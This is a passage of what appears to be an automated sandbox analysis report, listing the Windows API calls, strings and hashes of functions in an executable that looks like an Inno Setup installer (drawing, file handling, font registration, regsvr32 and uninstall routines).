                                                                          • Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768
                                                                          APIs
                                                                          • RectVisible.GDI32(?,?), ref: 00416E23
                                                                          • SaveDC.GDI32(?), ref: 00416E37
                                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                          • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                          • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                          • DeleteObject.GDI32(?), ref: 00416F32
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                          • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                          • DeleteObject.GDI32(?), ref: 00416F7F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                          • String ID:
                                                                          • API String ID: 375863564-0
                                                                          • Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                          • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                          • Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                          • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                          • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                          • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                          • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$EnableItem$System
                                                                          • String ID:
                                                                          • API String ID: 3985193851-0
                                                                          • Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                          • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                          • Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                          • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
                                                                          • API String ID: 390214022-3415521383
                                                                          • Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                          • Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
                                                                          • Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                          • Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
                                                                          • FreeLibrary.KERNEL32(02300000), ref: 0047FFD8
                                                                          • SendNotifyMessageA.USER32(00020464,00000496,00002710,00000000), ref: 0048004A
                                                                          Strings
                                                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
                                                                          • GetCustomSetupExitCode, xrefs: 0047FE79
                                                                          • DeinitializeSetup, xrefs: 0047FED5
                                                                          • Deinitializing Setup., xrefs: 0047FE3A
                                                                          • Restarting Windows., xrefs: 00480025
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary$MessageNotifySend
                                                                          • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                          • API String ID: 3817813901-1884538726
                                                                          • Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                          • Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
                                                                          • Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                          • Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99
                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(?), ref: 00460DEF
                                                                          • GetActiveWindow.USER32 ref: 00460E53
                                                                          • CoInitialize.OLE32(00000000), ref: 00460E67
                                                                          • SHBrowseForFolder.SHELL32(?), ref: 00460E7E
                                                                          • CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
                                                                          • SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
                                                                          • SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                          • String ID: A
                                                                          • API String ID: 2684663990-3554254475
                                                                          • Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                          • Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
                                                                          • Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                          • Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC
                                                                            • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
                                                                          • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                          • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                          • API String ID: 884541143-1710247218
                                                                          • Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                          • Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
                                                                          • Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                          • Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(02300000,inflateInit_), ref: 0045C9DD
                                                                          • GetProcAddress.KERNEL32(02300000,inflate), ref: 0045C9ED
                                                                          • GetProcAddress.KERNEL32(02300000,inflateEnd), ref: 0045C9FD
                                                                          • GetProcAddress.KERNEL32(02300000,inflateReset), ref: 0045CA0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                          • API String ID: 190572456-3516654456
                                                                          • Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                          • Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
                                                                          • Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                          • Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C
                                                                          APIs
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                          • 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                          • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                          • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$StretchText
                                                                          • String ID:
                                                                          • API String ID: 2984075790-0
                                                                          • Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                          • Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
                                                                          • Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                          • Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
                                                                          APIs
                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDirectoryHandleSystem
                                                                          • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                          • API String ID: 2051275411-1862435767
                                                                          • Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                          • Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
                                                                          • Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                          • Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59
                                                                          APIs
                                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
                                                                          • GetSysColor.USER32(00000014), ref: 0044CA04
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
                                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
                                                                          • GetSysColor.USER32(00000010), ref: 0044CA56
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Text$Color$Draw$OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 1005981011-0
                                                                          • Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                          • Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
                                                                          • Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                          • Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
                                                                          APIs
                                                                            • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
                                                                          • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
                                                                          • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
                                                                          • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34
                                                                          Strings
                                                                          • Deleting Uninstall data files., xrefs: 00494957
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                          • String ID: Deleting Uninstall data files.
                                                                          • API String ID: 1570157960-2568741658
                                                                          • Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                          • Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
                                                                          • Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                          • Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
                                                                          • AddFontResourceA.GDI32(00000000), ref: 0046F27B
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F
                                                                          Strings
                                                                          • AddFontResource, xrefs: 0046F299
                                                                          • Failed to open Fonts registry key., xrefs: 0046F265
                                                                          • Failed to set value in Fonts registry key., xrefs: 0046F250
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                          • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                          • API String ID: 955540645-649663873
                                                                          • Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                          • Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
                                                                          • Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                          • Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E
                                                                          APIs
                                                                            • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                            • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                            • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
